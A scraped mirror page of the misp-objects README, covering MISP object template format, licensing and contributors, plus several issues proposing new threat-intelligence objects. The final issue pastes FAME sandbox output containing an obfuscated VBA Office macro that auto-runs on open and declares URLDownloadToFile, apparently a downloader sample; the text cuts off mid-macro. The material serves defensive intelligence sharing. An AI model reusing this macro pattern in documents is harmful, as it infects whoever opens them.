Giter Club home page Giter Club logo

misp-objects's Introduction

misp-objects

Python application

MISP objects used in MISP system and can be used by other information sharing tools. MISP objects are in addition to MISP attributes to allow advanced combinations of attributes. The creation of these objects and their associated attributes are based on real cyber security use-cases and existing practices in information sharing.

Feel free to propose your own MISP objects template to be included in MISP. The system is similar to the misp-taxonomies where anyone can contribute their own objects to be included in MISP without modifying software.

Format of MISP object template

An example with 'domain-ip' of MISP object template

{
  "attributes": {
    "domain": {
      "categories": [
        "Network activity",
        "External analysis"
      ],
      "description": "Domain name",
      "misp-attribute": "domain",
      "multiple": true,
      "ui-priority": 1
    },
    "first-seen": {
      "description": "First time the tuple has been seen",
      "disable_correlation": true,
      "misp-attribute": "datetime",
      "ui-priority": 0
    },
    "ip": {
      "categories": [
        "Network activity",
        "External analysis"
      ],
      "description": "IP Address",
      "misp-attribute": "ip-dst",
      "multiple": true,
      "ui-priority": 1
    },
    "last-seen": {
      "description": "Last time the tuple has been seen",
      "disable_correlation": true,
      "misp-attribute": "datetime",
      "ui-priority": 0
    },
    "port": {
      "categories": [
        "Network activity",
        "External analysis"
      ],
      "description": "Associated TCP port with the domain",
      "misp-attribute": "port",
      "multiple": true,
      "ui-priority": 1
    },
    "registration-date": {
      "description": "Registration date of domain",
      "disable_correlation": false,
      "misp-attribute": "datetime",
      "ui-priority": 0
    },
    "text": {
      "description": "A description of the tuple",
      "disable_correlation": true,
      "misp-attribute": "text",
      "recommended": false,
      "ui-priority": 1
    }
  },
  "description": "A domain and IP address seen as a tuple in a specific time frame.",
  "meta-category": "network",
  "name": "domain-ip",
  "required": [
    "ip",
    "domain"
  ],
  "uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
  "version": 8
}

A MISP object is described in a simple JSON file containing the following elements.

  • name is the name of the your object.
  • meta-category is the category where the object falls into. (such as file, network, financial, misc, internal...)
  • description is a summary of the object description.
  • version is the version number as a decimal value.
  • required is an array containing the minimal required attributes to describe the object.
  • requiredOneOf is an array containing the attributes where at least one needs to be present to describe the object.
  • attributes contains another JSON object listing all the attributes composing the object.

Each attribute must contain a reference misp-attribute to reference an existing attribute definition in MISP (MISP attributes types are case-sensitive). An array categories shall be used to describe in which categories the attribute is. The ui-priority describes the usage frequency of an attribute. This helps to only display the most frequently used attributes and allowing advanced users to show all the attributes depending of their configuration. An optional multiple field shall be set to true if multiple elements of the same key can be used in the object. An optional values_list where this list of values can be selected as a value for an attribute. An optional sane_default where this list of value recommend potential a sane default for an attribute. An optional disable_correlation boolean field to suggest the disabling of correlation for a specific attribute. An optional to_ids boolean field to disable the IDS flag of an attribute.

Existing MISP objects

MISP objects relationships

The MISP object model is open and allows user to use their own relationships. MISP provides a list of default relationships that can be used if you plan to share your events with other MISP communities.

  • relationships - list of predefined default relationships which can be used to link MISP objects together and explain the context of the relationship.

How to contribute MISP objects?

Fork the project, create a new directory in the objects directory matching your object name. Objects must be composed of existing MISP attributes. If you are missing any specific attributes, feel free to open an issue in the MISP project.

We recommend to add a text attribute in an object to allow users to add comments or correlate text.

If the unparsed object can be included, a raw-base64 attribute can be used in the object to import the whole object.

Every object needs a uuid which can be created using uuidgen -r on a linux command line.

When the object is created, the validate_all.sh and jq_all_the_things.sh is run for validation, pull a request on this project. We usually merge the objects if it fits existing use-cases.

Best practices when creating MISP object templates

  • Use lower-case names without underscore or special characters (except minus) for the field names
  • Add a description in the object template explaining the scope and use-cases of your object templates
  • If the object is the mapping of an existing format, add a reference into the description of the object template
  • first-seen and last-seen are not required in a object template as an object has those fields by default. If you need additional temporal information, add new specific field(s).
  • Be lax on the number of fields required by default (e.g. use requiredOneOf).
  • Review existing object templates before creating a new one. When doing a pull-request, don't hesitate to add the logic why a new template is required.

MISP objects documentation

The MISP objects are documented at the following location in HTML and PDF.

The documentation is automatically generated from the MISP objects template expressed in JSON.

What are the advantages of MISP objects versus existing standards?

MISP objects are dynamically used objects that are contributed by users of MISP (the threat sharing platform) or other information sharing platforms.

The aim is to allow a dynamic update of objects definition in operational distributed sharing systems like MISP. Security threats and their related indicators are quite dynamic, standardized formats are quite static and new indicators require a significant time before being standardized.

The MISP object model allows for adding new combined indicator formats based on their usage without changing the underlying code base of MISP or other threat sharing platform using it. The definition of the objects can then be propagated along with the indicators itself.

License

MISP Object JSON files

The MISP objects (JSON files) are dual-licensed under:

or

 Copyright (c) 2016-2024 Alexandre Dulaunoy - [email protected]
 Copyright (c) 2016-2024 CIRCL - Computer Incident Response Center Luxembourg
 Copyright (c) 2016-2024 Andras Iklody
 Copyright (c) 2016-2024 Raphael Vinot
 Copyright (c) 2016-2024 Christian Studer
 Copyright (c) 2016-2024 Various contributors to MISP Project

 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:

    1. Redistributions of source code must retain the above copyright notice,
       this list of conditions and the following disclaimer.
    2. Redistributions in binary form must reproduce the above copyright notice,
       this list of conditions and the following disclaimer in the documentation
       and/or other materials provided with the distribution.

 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
 BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
 LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
 OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 OF THE POSSIBILITY OF SUCH DAMAGE.

If a specific author of a taxonomy wants to license it under a different license, a pull request can be requested.

Software


Copyright (C) 2016-2024 Andras Iklody
Copyright (C) 2016-2024 Alexandre Dulaunoy
Copyright (C) 2016-2024 CIRCL - Computer Incident Response Center Luxembourg

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU Affero General Public License for more details.

You should have received a copy of the GNU Affero General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.

misp-objects's People

Contributors

adulau avatar aks6193 avatar ater49 avatar c-goes avatar c00kie- avatar chrisr3d avatar cudeso avatar cvandeplas avatar davidcruciani avatar delta-sierra avatar digitalleukocyte avatar ecrimelabs avatar gallypette avatar goodlandsecurity avatar haxpak avatar iglocska avatar kx1499 avatar kx499 avatar matthijsvp avatar mfaou avatar rafiot avatar righel avatar rommelfs avatar samitainio avatar steveclement avatar terrtia avatar theobarrague avatar vvx7 avatar wachizungu avatar yodresh avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

hxp2k6 vulcanoio sebdraven truckydev jaegeral delta-sierra c-goes kx499-zz sthagen yodresh michael-hamm ldo-cert chrisr3d fl0x2208 mokaddem garanews ahuan-gdms stefankelm cocaman richieb2b aks6193 terrtia digitalleukocyte neok0 steveclement thomaspatzke ecrimelabs rommelfs marcnil815 fam-gtfo geekscrapy haxpak benhe119 zaphodef 3c7 saadkadhi dawid-czarnecki criptk n1col4s5742 juliusczars gudmo iglocska pettai cbboggs cudeso lfortemps dmoore44 shadowlyc evncert gallypette jakubonderka dougsec aske1204 emilhf rmkml rhallick tnawanna world-enterprise-collision frikky dekoder ater49 isamalrikabi seamustuohy misxjhen phmazzoni aaronkaplan joker72655561 stjordanis l1kw1d aisik00 0xrawsec shawnhank jloehel wachizungu cloud-target dreyergustav greynoise-intelligence mhpcchaves badis-dev enes-usta 0wlyw00d vasileios-mavroeidis hhgsandslab matthijsvp manalsalm joseluratm l0renor isabella232 ekwao9 jamesoneillone lgtm-migrator th3r3d gmh5225 davidcruciani hualin999 rickhenderson 00willo bigquin secjevops tmbc-nl

misp-objects's Issues

sandbox-signature

I see there is sandbox-report object where is possible to load the raw output from a sandbox but there isn't a tiny object such as sandbox-signature where can put the signatures that are matching (like av-signature object).
Example of signatures:
image

json of signatures:
image

At least to have the description and the name, with data (also if is interesting) object will go wider.
I'm wondering something like this definition.json:
image

What do you think?

x509 add fields (certigo)

Certigo tool can dump certificat information to json format.
It should be nice if we have more fields in x509 according to this tool.
You can find an example of .json dumped by certigo :
dumped-json.txt

Some interesting fields are :

  • is_self_signed (boolean)
  • is_ca (boolean)
  • pem
  • dns_names (multiple)
  • key_usage (multiple). E.g Digital Signature
  • extended_key_usage (multiple). E.g Serveur auth
  • ocsp_server
  • issuing_certificate

Subject field and Issuer field are subdivided according to the RFC 5280 (page 20) like that :

  • common_name
  • country
  • organization
  • organizational unit
  • distinguished name qualifier
  • state or province name
  • serial number
  • locality
  • title
  • surname
  • given name
  • initials
  • pseudonym
  • generation qualifier
  • key_id

Two solutions. The first one is to rename existing field to "subject-common-name", "subject-country", "issuer-common-name", "issuer-country", etc...
The second is to create an object "subject" and "issuer" with these attributs. I don't know what is the best :)

Cowrie honeypot object

Cowrie honeypot object first version released.

Object attribute MISP attribute type Description Disable correlation
message text Message of the cowrie honeypot  
username text Username related to the password(s)  
protocol text Protocol used in the cowrie honeypot  
src_ip ip-src Source IP address of the session  
eventid text Eventid of the session in the cowrie honeypot  
dst_ip ip-dst Destination IP address of the session  
session text Session id  
system text System origin in cowrie honeypot  
src_port port Source port of the session  
timestamp datetime When the event happened  
sensor text Cowrie sensor name  
passsword text Password  
isError text isError  
dst_port port Destination port of the session  

https://www.misp-project.org/objects.html#_cowrie

Based on the following discussion on Twitter, we might need to update the object to support malware sample collected and SSH meta information.

Script object template

Script object template - to store extracted evidence where a script is involved (from PowerShell to bash) and allow to trace timelines with the object relationship and maybe extend MISP to have syntax highlighting for such object.

Volatility - objects

mutantscan

JSON export field name

"columns": [
    "Offset(P)",
    "Pointers",
    "Handles",
    "Signal",
    "Thread",
    "CID",
    "Name"
  ]
[33379968, 1, 1, "1", 0, "", ""], [33382448, 2, 1, "1", 0, "", "746bbf3569adEncrypt"], [33387864, 1, 1, "1", 0, "", ""], [33394584, 1, 1, "1", 0, "", ""], [33427592, 2, 1, "1", 0, "", "_SHuassist.mtx"]

SSDT

  "columns": [
    "Table",
    "TableOffset",
    "NumEntries",
    "Entry",
    "Addr",
    "Function",
    "Owner"
  ]
[
      "SSDT[1]",
      3214515072,
      667,
      4761,
      3214226858,
      "NtGdiUMPDEngFreeUserMem",
      "win32k.sys"
    ],
    [
      "SSDT[1]",
      3214515072,
      667,
      4762,
      3212932649,
      "NtGdiDrawStream",
      "win32k.sys"
    ]

modules

 "columns": [
    "Offset(V)",
    "Name",
    "Base",
    "Size",
    "File"
  ]
   [
      2182709560,
      "ParVdm.SYS",
      4173201408,
      8192,
      "\\SystemRoot\\System32\\Drivers\\ParVdm.SYS"
    ],
    [
      2183500848,
      "srv.sys",
      4152414208,
      335872,
      "\\SystemRoot\\system32\\DRIVERS\\srv.sys"
    ],
    [
      2182893856,
      "HTTP.sys",
      4150018048,
      266240,
      "\\SystemRoot\\System32\\Drivers\\HTTP.sys"
    ]

connscan

{
  "rows": [
    [
      34108960,
      "172.16.112.128:1038",
      "41.168.5.140:8080",
      1484
    ],
    [
      37388296,
      "172.16.112.128:1037",
      "125.19.103.198:8080",
      1484
    ]
  ],
  "columns": [
    "Offset(P)",
    "LocalAddress",
    "RemoteAddress",
    "PID"
  ]
}

This one can be easily mapped to netflow object.

FAME format 

{
  "analysis": {
    "support_files": {},
    "logs": [
      "2017-03-24 11:17: debug: Trying to queue module 'apk'",
      "2017-03-24 11:17: debug: Trying to queue module 'eml'",
      "2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
      "2017-03-24 11:17: debug: Trying to queue module 'pdf'",
      "2017-03-24 11:17: debug: Trying to queue module 'zip'",
      "2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
      "2017-03-24 11:17: debug: Trying to run office_macros",
      "2017-03-24 11:17: debug: Done with office_macros"
    ],
    "extractions": [],
    "results": {
      "office_macros": {
        "macros": "Attribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n#If VBA7 Then\r\n    Private Declare PtrSafe Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As LongPtr, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As LongPtr) As LongPtr\r\n#Else\r\n    Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As Long, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\n\r\nSub FUJdsfFF()\r\n\r\nDim onOImAGL As Integer\r\n\r\nDim gVrscpjD As Integer\r\n\r\nDim hHOWWjbQ As Integer\r\nhHOWWjbQ = 1\r\nDo While hHOWWjbQ < 72\r\nDoEvents: hHOWWjbQ = hHOWWjbQ + 1\r\nLoop\r\n\r\ngVrscpjD = 3\r\nDo While gVrscpjD < 12\r\n\r\nDim llSODdsW As Integer\r\nllSODdsW = 4\r\nDo While llSODdsW < 77\r\nDoEvents: llSODdsW = llSODdsW + 1\r\nLoop\r\n\r\nDoEvents: gVrscpjD = gVrscpjD + 1\r\n\r\nDim elUrgZPg As Integer\r\nelUrgZPg = 8\r\nDo While elUrgZPg < 86\r\nDoEvents: elUrgZPg = elUrgZPg + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim LnAAEDND As Integer\r\nLnAAEDND = 6\r\nDo While LnAAEDND < 67\r\nDoEvents: LnAAEDND = LnAAEDND + 1\r\nLoop\r\n\r\nonOImAGL = 2\r\nDo While onOImAGL < 69\r\n\r\nDim ttVOSmYq As Integer\r\n\r\nDim lAXCAjVL As Integer\r\nlAXCAjVL = 2\r\nDo While lAXCAjVL < 27\r\nDoEvents: lAXCAjVL = lAXCAjVL + 1\r\nLoop\r\n\r\nttVOSmYq = 2\r\nDo While ttVOSmYq < 83\r\n\r\nDim anNRJYwm As Integer\r\nanNRJYwm = 1\r\nDo While anNRJYwm < 87\r\nDoEvents: anNRJYwm = anNRJYwm + 1\r\nLoop\r\n\r\nDoEvents: ttVOSmYq = ttVOSmYq + 1\r\n\r\nDim EgAvDrgN As Integer\r\nEgAvDrgN = 3\r\nDo While EgAvDrgN < 73\r\nDoEvents: EgAvDrgN = EgAvDrgN + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim BGFxWEBE As Integer\r\nBGFxWEBE = 7\r\nDo While BGFxWEBE < 18\r\nDoEvents: BGFxWEBE = BGFxWEBE + 1\r\nLoop\r\n\r\nDoEvents: onOImAGL = onOImAGL + 1\r\n\r\nDim YLbEILbH As Integer\r\n\r\nDim USzkBLms As Integer\r\nUSzkBLms = 7\r\nDo While USzkBLms < 74\r\nDoEvents: USzkBLms = USzkBLms + 1\r\nLoop\r\n\r\nYLbEILbH = 4\r\nDo While YLbEILbH < 78\r\n\r\nDim kYEgOsrM As Integer\r\nkYEgOsrM = 1\r\nDo While kYEgOsrM < 18\r\nDoEvents: kYEgOsrM = kYEgOsrM + 1\r\nLoop\r\n\r\nDoEvents: YLbEILbH = YLbEILbH + 1\r\n\r\nDim kRSZcdez As Integer\r\nkRSZcdez = 4\r\nDo While kRSZcdez < 79\r\nDoEvents: kRSZcdez = kRSZcdez + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiIMoHeK As Integer\r\nDiIMoHeK = 7\r\nDo While DiIMoHeK < 25\r\nDoEvents: DiIMoHeK = DiIMoHeK + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim hFWJmrYt As Integer\r\n\r\nDim EqXLaagR As Integer\r\nEqXLaagR = 3\r\nDo While EqXLaagR < 72\r\nDoEvents: EqXLaagR = EqXLaagR + 1\r\nLoop\r\n\r\nhFWJmrYt = 1\r\nDo While hFWJmrYt < 72\r\n\r\nDim QgtpZXeG As Integer\r\nQgtpZXeG = 5\r\nDo While QgtpZXeG < 83\r\nDoEvents: QgtpZXeG = QgtpZXeG + 1\r\nLoop\r\n\r\nDoEvents: hFWJmrYt = hFWJmrYt + 1\r\n\r\nDim KbUCXFUS As Integer\r\nKbUCXFUS = 8\r\nDo While KbUCXFUS < 67\r\nDoEvents: KbUCXFUS = KbUCXFUS + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiUVMCVs As Integer\r\nDiUVMCVs = 7\r\nDo While DiUVMCVs < 54\r\nDoEvents: DiUVMCVs = DiUVMCVs + 1\r\nLoop\r\n\r\npHUgdsf\r\nEnd Sub\r\nSub AutoOpen()\r\n\r\nDim GHfjoXwI As Integer\r\n\r\nDim RrEuvFPw As Integer\r\n\r\nDim jOgmvxII As Integer\r\njOgmvxII = 4\r\nDo While jOgmvxII < 71\r\nDoEvents: jOgmvxII = jOgmvxII + 1\r\nLoop\r\n\r\nRrEuvFPw = 4\r\nDo While RrEuvFPw < 43\r\n\r\nDim rpbTcQis As Integer\r\nrpbTcQis = 1\r\nDo While rpbTcQis < 56\r\nDoEvents: rpbTcQis = rpbTcQis + 1\r\nLoop\r\n\r\nDoEvents: RrEuvFPw = RrEuvFPw + 1\r\n\r\nDim kEKoHcEt As Integer\r\nkEKoHcEt = 1\r\nDo While kEKoHcEt < 17\r\nDoEvents: kEKoHcEt = kEKoHcEt + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim trzlGSeU As Integer\r\ntrzlGSeU = 2\r\nDo While trzlGSeU < 83\r\nDoEvents: trzlGSeU = trzlGSeU + 1\r\nLoop\r\n\r\nGHfjoXwI = 8\r\nDo While GHfjoXwI < 51\r\n\r\nDim fVrtiule As Integer\r\n\r\nDim QkHgluUE As Integer\r\nQkHgluUE = 7\r\nDo While QkHgluUE < 55\r\nDoEvents: QkHgluUE = QkHgluUE + 1\r\nLoop\r\n\r\nfVrtiule = 1\r\nDo While fVrtiule < 12\r\n\r\nDim kTUBSEnj As Integer\r\nkTUBSEnj = 4\r\nDo While kTUBSEnj < 42\r\nDoEvents: kTUBSEnj = kTUBSEnj + 1\r\nLoop\r\n\r\nDoEvents: fVrtiule = fVrtiule + 1\r\n\r\nDim vHqDywtf As Integer\r\nvHqDywtf = 5\r\nDo While vHqDywtf < 82\r\nDoEvents: vHqDywtf = vHqDywtf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim VWsUAVut As Integer\r\nVWsUAVut = 9\r\nDo While VWsUAVut < 43\r\nDoEvents: VWsUAVut = VWsUAVut + 1\r\nLoop\r\n\r\nDoEvents: GHfjoXwI = GHfjoXwI + 1\r\n\r\nDim gXfkXukq As Integer\r\n\r\nDim cBxGPnur As Integer\r\ncBxGPnur = 2\r\nDo While cBxGPnur < 22\r\nDoEvents: cBxGPnur = cBxGPnur + 1\r\nLoop\r\n\r\ngXfkXukq = 3\r\nDo While gXfkXukq < 73\r\n\r\nDim IOhlZkQp As Integer\r\nIOhlZkQp = 4\r\nDo While IOhlZkQp < 48\r\nDoEvents: IOhlZkQp = IOhlZkQp + 1\r\nLoop\r\n\r\nDoEvents: gXfkXukq = gXfkXukq + 1\r\n\r\nDim ZlyyQbrA As Integer\r\nZlyyQbrA = 3\r\nDo While ZlyyQbrA < 74\r\nDoEvents: ZlyyQbrA = ZlyyQbrA + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DrVPZjIU As Integer\r\nDrVPZjIU = 5\r\nDo While DrVPZjIU < 81\r\nDoEvents: DrVPZjIU = DrVPZjIU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim qhAjHodv As Integer\r\n\r\nDim vKVKSKJC As Integer\r\nvKVKSKJC = 3\r\nDo While vKVKSKJC < 83\r\nDoEvents: vKVKSKJC = vKVKSKJC + 1\r\nLoop\r\n\r\nqhAjHodv = 9\r\nDo While qhAjHodv < 43\r\n\r\nDim PZHwRIwe As Integer\r\nPZHwRIwe = 7\r\nDo While PZHwRIwe < 19\r\nDoEvents: PZHwRIwe = PZHwRIwe + 1\r\nLoop\r\n\r\nDoEvents: qhAjHodv = qhAjHodv + 1\r\n\r\nDim gCzEGztZ As Integer\r\ngCzEGztZ = 1\r\nDo While gCzEGztZ < 12\r\nDoEvents: gCzEGztZ = gCzEGztZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim nUMuULOI As Integer\r\nnUMuULOI = 3\r\nDo While nUMuULOI < 38\r\nDoEvents: nUMuULOI = nUMuULOI + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub Workbook_Open()\r\n\r\nDim AlqbZoUs As Integer\r\n\r\nDim RuhoEKkH As Integer\r\n\r\nDim dsDIRhxi As Integer\r\ndsDIRhxi = 1\r\nDo While dsDIRhxi < 42\r\nDoEvents: dsDIRhxi = dsDIRhxi + 1\r\nLoop\r\n\r\nRuhoEKkH = 6\r\nDo While RuhoEKkH < 43\r\n\r\nDim jFHxcspk As Integer\r\njFHxcspk = 1\r\nDo While jFHxcspk < 57\r\nDoEvents: jFHxcspk = jFHxcspk + 1\r\nLoop\r\n\r\nDoEvents: RuhoEKkH = RuhoEKkH + 1\r\n\r\nDim wfydWqpb As Integer\r\nwfydWqpb = 4\r\nDo While wfydWqpb < 25\r\nDoEvents: wfydWqpb = wfydWqpb + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tiYpRELi As Integer\r\ntiYpRELi = 2\r\nDo While tiYpRELi < 27\r\nDoEvents: tiYpRELi = tiYpRELi + 1\r\nLoop\r\n\r\nAlqbZoUs = 3\r\nDo While AlqbZoUs < 64\r\n\r\nDim SqbbyDua As Integer\r\n\r\nDim yBlsPRDQ As Integer\r\nyBlsPRDQ = 8\r\nDo While yBlsPRDQ < 82\r\nDoEvents: yBlsPRDQ = yBlsPRDQ + 1\r\nLoop\r\n\r\nSqbbyDua = 7\r\nDo While SqbbyDua < 78\r\n\r\nDim OTnOGyJR As Integer\r\nOTnOGyJR = 4\r\nDo While OTnOGyJR < 48\r\nDoEvents: OTnOGyJR = OTnOGyJR + 1\r\nLoop\r\n\r\nDoEvents: SqbbyDua = SqbbyDua + 1\r\n\r\nDim aTZbxDek As Integer\r\naTZbxDek = 1\r\nDo While aTZbxDek < 49\r\nDoEvents: aTZbxDek = aTZbxDek + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EfRdRuRJ As Integer\r\nEfRdRuRJ = 3\r\nDo While EfRdRuRJ < 73\r\nDoEvents: EfRdRuRJ = EfRdRuRJ + 1\r\nLoop\r\n\r\nDoEvents: AlqbZoUs = AlqbZoUs + 1\r\n\r\nDim fBalzqNT As Integer\r\n\r\nDim pbTqSExS As Integer\r\npbTqSExS = 3\r\nDo While pbTqSExS < 97\r\nDoEvents: pbTqSExS = pbTqSExS + 1\r\nLoop\r\n\r\nfBalzqNT = 3\r\nDo While fBalzqNT < 64\r\n\r\nDim YVCJKqII As Integer\r\nYVCJKqII = 6\r\nDo While YVCJKqII < 42\r\nDoEvents: YVCJKqII = YVCJKqII + 1\r\nLoop\r\n\r\nDoEvents: fBalzqNT = fBalzqNT + 1\r\n\r\nDim JPYiWagU As Integer\r\nJPYiWagU = 6\r\nDo While JPYiWagU < 21\r\nDoEvents: JPYiWagU = JPYiWagU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim lxkhTbul As Integer\r\nlxkhTbul = 4\r\nDo While lxkhTbul < 78\r\nDoEvents: lxkhTbul = lxkhTbul + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OZXQDGNw As Integer\r\n\r\nDim JSvDIoAQ As Integer\r\nJSvDIoAQ = 8\r\nDo While JSvDIoAQ < 22\r\nDoEvents: JSvDIoAQ = JSvDIoAQ + 1\r\nLoop\r\n\r\nOZXQDGNw = 7\r\nDo While OZXQDGNw < 19\r\n\r\nDim teaRGXXQ As Integer\r\nteaRGXXQ = 2\r\nDo While teaRGXXQ < 55\r\nDoEvents: teaRGXXQ = teaRGXXQ + 1\r\nLoop\r\n\r\nDoEvents: OZXQDGNw = OZXQDGNw + 1\r\n\r\nDim jGPMKSAO As Integer\r\njGPMKSAO = 1\r\nDo While jGPMKSAO < 19\r\nDoEvents: jGPMKSAO = jGPMKSAO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rqjmqefl As Integer\r\nrqjmqefl = 1\r\nDo While rqjmqefl < 84\r\nDoEvents: rqjmqefl = rqjmqefl + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub pHUgdsf()\r\n\r\nDim YMcAptkZ As Integer\r\n\r\nDim nElVlNph As Integer\r\n\r\nDim ouChrOFS As Integer\r\nouChrOFS = 2\r\nDo While ouChrOFS < 65\r\nDoEvents: ouChrOFS = ouChrOFS + 1\r\nLoop\r\n\r\nnElVlNph = 3\r\nDo While nElVlNph < 37\r\n\r\nDim CZRGcNnw As Integer\r\nCZRGcNnw = 9\r\nDo While CZRGcNnw < 39\r\nDoEvents: CZRGcNnw = CZRGcNnw + 1\r\nLoop\r\n\r\nDoEvents: nElVlNph = nElVlNph + 1\r\n\r\nDim MMrGXtII As Integer\r\nMMrGXtII = 6\r\nDo While MMrGXtII < 61\r\nDoEvents: MMrGXtII = MMrGXtII + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MHcjbtTC As Integer\r\nMHcjbtTC = 6\r\nDo While MHcjbtTC < 69\r\nDoEvents: MHcjbtTC = MHcjbtTC + 1\r\nLoop\r\n\r\nYMcAptkZ = 6\r\nDo While YMcAptkZ < 65\r\n\r\nDim AbSvXauR As Integer\r\n\r\nDim arSpIiDI As Integer\r\narSpIiDI = 1\r\nDo While arSpIiDI < 73\r\nDoEvents: arSpIiDI = arSpIiDI + 1\r\nLoop\r\n\r\nAbSvXauR = 5\r\nDo While AbSvXauR < 37\r\n\r\nDim UkEMzRUw As Integer\r\nUkEMzRUw = 7\r\nDo While UkEMzRUw < 45\r\nDoEvents: UkEMzRUw = UkEMzRUw + 1\r\nLoop\r\n\r\nDoEvents: AbSvXauR = AbSvXauR + 1\r\n\r\nDim RIeMAIHI As Integer\r\nRIeMAIHI = 4\r\nDo While RIeMAIHI < 76\r\nDoEvents: RIeMAIHI = RIeMAIHI + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rFtFCsKb As Integer\r\nrFtFCsKb = 8\r\nDo While rFtFCsKb < 52\r\nDoEvents: rFtFCsKb = rFtFCsKb + 1\r\nLoop\r\n\r\nDoEvents: YMcAptkZ = YMcAptkZ + 1\r\n\r\nDim GKtegDZc As Integer\r\n\r\nDim lNubgLMm As Integer\r\nlNubgLMm = 2\r\nDo While lNubgLMm < 22\r\nDoEvents: lNubgLMm = lNubgLMm + 1\r\nLoop\r\n\r\nGKtegDZc = 5\r\nDo While GKtegDZc < 98\r\n\r\nDim KNTIrcol As Integer\r\nKNTIrcol = 6\r\nDo While KNTIrcol < 62\r\nDoEvents: KNTIrcol = KNTIrcol + 1\r\nLoop\r\n\r\nDoEvents: GKtegDZc = GKtegDZc + 1\r\n\r\nDim fADzmtxi As Integer\r\nfADzmtxi = 3\r\nDo While fADzmtxi < 69\r\nDoEvents: fADzmtxi = fADzmtxi + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim YlwwqGKp As Integer\r\nYlwwqGKp = 6\r\nDo While YlwwqGKp < 17\r\nDoEvents: YlwwqGKp = YlwwqGKp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CXflHUkI As Integer\r\n\r\nDim rOZLfbfA As Integer\r\nrOZLfbfA = 8\r\nDo While rOZLfbfA < 26\r\nDoEvents: rOZLfbfA = rOZLfbfA + 1\r\nLoop\r\n\r\nCXflHUkI = 7\r\nDo While CXflHUkI < 19\r\n\r\nDim WQLYXSGt As Integer\r\nWQLYXSGt = 7\r\nDo While WQLYXSGt < 17\r\nDoEvents: WQLYXSGt = WQLYXSGt + 1\r\nLoop\r\n\r\nDoEvents: CXflHUkI = CXflHUkI + 1\r\n\r\nDim jsaNfleM As Integer\r\njsaNfleM = 4\r\nDo While jsaNfleM < 14\r\nDoEvents: jsaNfleM = jsaNfleM + 